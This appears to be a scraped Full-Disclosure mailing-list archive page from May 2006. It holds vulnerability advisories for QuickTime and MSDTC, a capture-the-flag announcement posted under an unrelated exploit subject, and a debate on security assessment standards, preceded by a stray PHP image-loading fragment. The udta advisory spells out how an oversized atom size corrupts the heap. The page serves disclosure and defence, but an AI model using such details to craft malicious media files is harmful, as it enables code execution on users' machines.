(compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Possible script:
-514.php--
?
$log = /var/tmp/debug.log;
$img_type = png;
function load_png($img_path) {
$img = imagecreatefrompng ($img_path);
if ($img) {
return $img;
}
}
function load_gif($img_path) {
$img = imagecreatefromgif ($img_path);
if ($img) {
return $img;
}
}
function load_jpg($img_path) {
$img = imagecreatefromjpeg ($img_path);
if ($img) {
return $img;
[Full-disclosure] ZDI-06-015: Apple QuickTime H.264 Parsing Heap Overflow Vulnerability
ZDI-06-015: Apple QuickTime H.264 Parsing Heap Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-015.html May 11, 2006 -- CVE ID: CVE-2006-1463 -- Affected Vendor: Apple -- Affected Products: Apple QuickTime versions prior to 7.1 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since March 20, 2006 by Digital Vaccine protection filter ID 4183. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Apple's QuickTime media player. The specific flaw exists within the parsing of H.264 content. The implicit trust of a user-supplied size value during a memory copy loop allows an attacker to create an exploitable memory corruption condition. Exploitation requires that an attacker either coerce the target to open a malformed media file or visit a website embedding the malicious file. -- Vendor Response: Apple has identified and corrected this issue in QuickTime 7.1. Customers can obtain the fix from Apple's Software Downloads web site: http://www.apple.com/support/downloads/ For further details see: http://docs.info.apple.com/article.html?artnum=61798 -- Disclosure Timeline: 2006.03.20 - Vulnerability reported to vendor 2006.03.20 - Digital Vaccine released to TippingPoint customers 2006.05.11 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by ATmaCA. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Kenshoto Report: IIS 6.0 Remote Exploit PoC
Once again ... kenshoto will be running the Defcon Capture the Flag contest in 2006. This year's CtF will be a knock-down-drag-out-cyberninja war, the likes of which the world has never seen (except maybe last year). For the qualifying round, we've widened the scope from last year. With multiple challenges in various categories, there's something for every hacker, regardless of skillset (except running scripts and writing perl). The core skill for this contest will be finding vulnerabilities in software. Those of you who have avoided playing in CtF because you think it is for lamers, we bet you can't find all our vulnerabilities. Teams will still need to defend a server, and will need to be able to exploit the vulnerabilities they find. As last year, the vulnerabilities will be 100%-custom, so leave your nessus, metasploit and core impact bullshit at home. There will be a qualifying round, which will start on Friday, June 9th at 10:00 PM EDT. Only 8 teams will qualify. Last year's winners,Shellphish, are automatically qualified (leaving 7 team slots), unless they too decide to play in the qualifying round, in which case they willstill need to place in the top 8. Registration is currently open at http://kenshoto.com/quals/ We encourage anyone (even individuals) to attempt to qualify, even if as a learning experience. We intend quals to be enjoyable for everyone,regardless of your plans for Defcon. Challenges will range wildlyin difficulty from Mitnick to Eagle we've got it all.Good luck... you're going to need it. -kenshoto ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Apple QuickTimeStreamingServer RTSP Server Vulnerability [MU-200605-02]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Apple QuickTimeStreamingServer RTSP Server Vulnerability [MU-200605-02] May 11, 2006 http://labs.musecurity.com/advisories.html Affected Product / Versions: QuickTimeStreamingServer 5.5 and earlier Product Overview: The Real Time Streaming Protocol (RTSP) is a protocol which allows a client to remotely control a streaming media server. RTSP is implemented in the QuickTimeStreamingServer, a cross platform media streaming server. Vulnerability Details: A remote buffer overflow condition in Apple's RTSP service could allow for arbitrary code execution. The vulnerable code is triggered with the use of a malformed RTSP header. Vendor Response / Solution: Mu Security would like to thank Apple for timely remediation of these vulnerabilities. Credit: This vulnerability was discovered by the Mu Security research team. http://labs.musecurity.com/pgpkey.txt Mu Security is an early-stage innovator creating a new class of security analysis system. The company's mission is to widely deploy security analysis and reduce product and application vulnerabilities. Mu's founders include industry-recognized experts in the IDP, open source protocol analysis tools, ethical hacking, and network management markets The security analysis process and product solution provide a rigorous and streamlined methodology for verifying and improving the security readiness of any IP-based product or application. Mu Security, headquartered in Sunnyvale, California, is backed by preeminent venture capital firms including Accel Partners and Benchmark Capital. The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (Darwin) iD8DBQFEY797Ml+docYeP+YRAk7cAJ9IxGCMsOiNyviKzMa3qEOV8oph8QCfa2wz j964qHFHY4I8yPM1pyq4SEc= =Gcsg -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] How secure is software X?
How secure is software X? At least as secure as Vulnerability Assessment Assurance Level P; or Q or R. Well, that's what I think we should be able to say. What we need is an open standard, that has been agreed upon by recognized experts, against which the absence of software security vulnerability can be measured - something which improves upon the failings of the Common Criteria. Let's choose web server software as an example. When looking for flaws in a new piece of web server software there are a bunch of well known checks that one would throw at it first. Try directory traversal attacks and the several variations. Try overflowing the request method, the URI, the query string, the host header field and so on. Try cross site scripting attacks in server error pages and file not found messages. As I said, there's a bunch of checks and I've mentioned but a few. If these were all written down and labelled with as a standard then one could say that web server software X is at least as secure as the standard - providing of course the server stands up. For products that are based upon RFCs it would be trivial to write a simple criteria that tests every aspect of the software as per the RFCs. This would be called Vulnerability Assessment Assurance Level: Protocol. If a bit of software was accredited at VAAL:Protocol then it would given a level of assurance that it at least stood up to those attacks. Not all products are RFC compliant however. Sticking with web servers, one bit of software might have a bespoke request method of FOOBAR. This opens up a whole new attack surface that's not covered by the VAAL:Protocol standard. There are two aspects to this. Anyone with a firewall capable of blocking non-RFC compliant requests could configure it to do so - thus closing off the attack surface - from the outside at least. As far as the standards go however - you'd have to introduce criteria to cover that specific functionality. And what about different application environments running on top of the web server? And what about more complex products such as database servers? I suppose at a minimum for DB software you could at least have a standard that simply checks if the server falls to a long username or password buffer overflow attempt and then fuzz SQL-92 language elements. It certainly makes standardization much more difficult but I think by no means impossible. Clearly, what is _easy_ is writing and agreeing upon a VAAL:Protocol standard for many different types of servers. You could then be assured that any server that passes is at least as secure as VAAL:Protocol and for those looking for more comfort then they can at least block non-RFC compliant traffic. Having had a chat with Steve Christey about this earlier today I know there are other people thinking along the same lines and I bet there are more projects out there being worked on that are attempting to achieve the same thing. If anyone is currently working on this stuff or would like to get involved in thrashing out some ideas then please mail me - I'd love to hear from you. Cheers, David Litchfield http://www.databasesecurity.com/ http://www.ngssoftware.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How secure is software X?
On 5/12/06, David Litchfield [EMAIL PROTECTED] wrote: How secure is software X? At least as secure as Vulnerability Assessment Assurance Level P; or Q or R. Well, that's what I think we should be able to say. What we need is an open standard, that has been agreed upon by recognized experts, against which the absence of software security vulnerability can be measured - something which improves upon the failings of the Common Criteria. Let's choose web server software as an example. When looking for flaws in a new piece of web server software there are a bunch of well known checks that one would throw at it first. Try directory traversal attacks and the several variations. Try overflowing the request method, the URI, the query string, the host header field and so on. Try cross site scripting attacks in server error pages and file not found messages. As I said, there's a bunch of checks and I've mentioned but a few. If these were all written down and labelled with as a standard then one could say that web server software X is at least as secure as the standard - providing of course the server stands up. For products that are based upon RFCs it would be trivial to write a simple criteria that tests every aspect of the software as per the RFCs. This would be called Vulnerability Assessment Assurance Level: Protocol. If a bit of software was accredited at VAAL:Protocol then it would given a level of assurance that it at least stood up to those attacks. Not all products are RFC compliant however. Sticking with web servers, one bit of software might have a bespoke request method of FOOBAR. This opens up a whole new attack surface that's not covered by the VAAL:Protocol standard. There are two aspects to this. Anyone with a firewall capable of blocking non-RFC compliant requests could configure it to do so - thus closing off the attack surface - from the outside at least. As far as the standards go however - you'd have to introduce criteria to cover that specific functionality. And what about different application environments running on top of the web server? And what about more complex products such as database servers? I suppose at a minimum for DB software you could at least have a standard that simply checks if the server falls to a long username or password buffer overflow attempt and then fuzz SQL-92 language elements. It certainly makes standardization much more difficult but I think by no means impossible. Clearly, what is _easy_ is writing and agreeing upon a VAAL:Protocol standard for many different types of servers. You could then be assured that any server that passes is at least as secure as VAAL:Protocol and for those looking for more comfort then they can at least block non-RFC compliant traffic. Having had a chat with Steve Christey about this earlier today I know there are other people thinking along the same lines and I bet there are more projects out there being worked on that are attempting to achieve the same thing. If anyone is currently working on this stuff or would like to get involved in thrashing out some ideas then please mail me - I'd love to hear from you. why do we need this? you're referring to what already takes place commercially. hi i want a security assessment. who's going to do these assessments for free? who confirms that the people doing the assessment know what they are doing? Customer: I was hacked .. - me: - David Litchfield told me it was secure, blame him - David Litchfield: Oh no, our VAAL is just a guide. - Customer: So why the hell do I care about it then? Guides for people to use are okay (hello OWASP Guide, and others) but all your trying to start is a non-commercial free security assessment service. ... ? -- Michael ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How secure is software X?
From: Michael Silk [EMAIL PROTECTED] SNIP why do we need this? Take your average bit of common software. I can bet someone's thrown Spike at it, someone else crazyfuzz, and another foofuz. Now let's say that it stood up to everything that was thrown at it - and let's say another product crumbled in the first few seconds. I'd rather have the first product on my network if, as a business requirement, I need the functionality that that software provided. Sure - it's not a guarantee that it's devoid of security vulnerability but I can be assured that the software's not going to fall to a script kiddie. If a product did stand up the Spike, crazyfuzz and foofuzz then let's talk about it! The problem is you only ever hear about when these fuzzers actually find things. What I'm suggesting is simply collating our bug-hunting collective knowledge into a standard. Those who wish to protect their trade secret bug find techniques don't have to play if they don't want. But in answering why do we need this? you clearly don't - but there are people out there that do need this - or at least would like it. you're referring to what already takes place commercially. hi i want a security assessment. who's going to do these assessments for free? who confirms that the people doing the assessment know what they are doing? The thing with a standard is that it is a standard. A such efforts should be entirely reproducible. Have 3 or more people follow that standard and compare results at the end. If there's a discrepancy someone's not following the standard. The other aspect of course that it's trivial to write and verify tools that follow a standard. Customer: I was hacked .. - me: - David Litchfield told me it was secure, blame him - David Litchfield: Oh no, our VAAL is just a guide. - Customer: So why the hell do I care about it then? Guides for people to use are okay (hello OWASP Guide, and others) but all your trying to start is a non-commercial free security assessment service. Absolutely. Let's face it - it's what goes on every day, anyway. At least people who care about assurance would be able to make something useful out of all that effort. Besides, who said it had to be free? Like CC - if a company wanted their product evaluated they could pay for it. Or not. I'm sure cost will become relevant at some point but not now. I'm more interested in the technical merits at the moment. Cheers, David Litchfield http://www.databasesecurity.com/ http://www.ngssoftware.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Apple QuickTime udta ATOM Heap Overflow
Apple QuickTime udta ATOM Heap Overflow By Sowhat of Nevis Labs Date: 2006.05.12 http://www.nevisnetworks.com http://secway.org/advisory/AD20060512.txt Vendor: Apple Inc. Affected Versions: Apple QuickTime versions 7.1 Overview: We have discovered a critical vulnerability in Quicktime Player. The vulnerability allows an attacker to execute arbitrary code in the context of the user who executes QuickTime. This vulnerability can be exploited By persuading a user to open a carefully crafted .mov files or visit a website embedding the malicious .mov file. Details: This vulnerability exists in the way Quicktime process the udta Atom of the .mov files. The layout of a udta(user data atom) atom: Bytes ___ |User data atom | | Atom size | 4 |Type = 'udta' | 4 | | | User data list | | Atom size | 4 | Type = user data types| 4 | | --- By setting the value of the Atom size to a large value such as 0x, an insufficiently-sized heap block will be allocated, and resulting in a classic complete heap memory overwrite during the RtlAllocateHeap() function. Vendor Response: 2006.05.06 Vendor notified via [EMAIL PROTECTED] 2006.05.07 Vendor responded 2006.05.09 Vendor ask for more information 2006.05.11 Vendor released QuickTime 7.1 2006.05.12 Advisory released Vendor was contacted in 05/06/2006, and they said: This message is being sent to you by a security analyst who has reviewed your note. The issue is being investigated, and we appreciate the time you have taken to report it to us. This vulnerability no longer exists in their new release(7.1), However the vendor didnt formally inform me about the patch. Greetings to Ajit, Chi, Xin, Linlin and all guys in India US Nevis Labs Reference: 1. http://developer.apple.com/documentation/QuickTime/QTFF/index.html 2. http://docs.info.apple.com/article.html?artnum=303752 -- Sowhat http://secway.org Life is like a bug, Do you know how to exploit it ? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft MSDTC NdrAllocate Validation Vulnerability
Shut the fuck up!!2006/5/11, [EMAIL PROTECTED] [EMAIL PROTECTED]: Shouldnt this be considered low risk and not medium?On Wed, 10 May 2006 17:01:09 -0700 Avert [EMAIL PROTECTED]wrote:McAfee, Inc.McAfee Avert(tm) Labs Security Advisory Public Release Date: 2006-05-09Microsoft MSDTC NdrAllocate Validation VulnerabilityCVE-2006-0034__ *SynopsisThere is an RPC procedure within the MSDTC interface inmsdtcprx.dllthat may be called remotely without user credentials in such a waythattriggers a denial-of-service in the Distributed Transaction Coordinator(MSDTC) service.Exploitation can at most lead to a denial of service and thereforetherisk factor is at medium.___ ___*Vulnerable SystemsMicrosoft Windows 2000Microsoft Windows XPMicrosoft Windows Server 2003___ ___*Vulnerability InformationThe msdtcprx.dll shared library contains RPC procedures for usewiththe Distributed Transaction Coordinator (MSDTC) service utilized inMicrosoft Windows.By sending a large (greater than 4k) request to BuildContextW(), asize check can be bypassed and a bug in NdrAllocate() may bereached.This vulnerability was reported to Microsoft on October 12, 2005 __*ResolutionMicrosoft has provided a patch for this issue.Please see theirbulletin, KB913580, for more information on obtaining and installingthe patch.__*CreditsThis vulnerability was discovered by Chen Xiaobo of McAfee Avert Labs. *Legal NoticeCopyright (C) 2006 McAfee, Inc.The information contained within this advisory is provided for theconvenience of McAfee's customers, and may be redistributedprovided that no fee is charged for distribution and that the advisory isnotmodified in any way.McAfee makes no representations orwarrantiesregarding the accuracy of the information referenced in this document,or the suitability of that information for your purposes.McAfee, Inc. and McAfee Avert Labs are registered Trademarks ofMcAfee,Inc. and/or its affiliated companies in the United States and/or otherCountries.All other registered and unregistered trademarks inthisdocument are the sole property of their respective owners.___ __Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480Get the best prices on SSL certificates from Hushmailhttps://www.hushssl.com?l=485___ Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How secure is software X?
So pin it down a bit more for me. Do you want just public results of standardized blackbox testing? Something similar to the ICSA firewall certification? (Though, I assume you want actual public results.) Would you include source review? The Sardonix project tried to do that. Who does the testing, and who pays for the time and equipment to do that? Do all products get re-tested every time a new version of the product suite is released? Do the test suites have to be free? Do they re-test for every release of the victim software? Don't people like yourself derive some benefit from having some portion of your assessment work stay proprietary? If I'm trying to enhance the test suite with some new fuzzing, and I find a sexy bug, don't the incentives tend to lean towards me selling the bug to iDefense and hiding my fuzzer in the meantime? Don't we fairly quickly arrive at all products passing all the standard tests, and passing no longer means anything? I like the idea, but I'm wondering why people would contribute. I'm also wondering how it can it stay consumer-beneficial, and not end up being driven by product vendors. BB ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
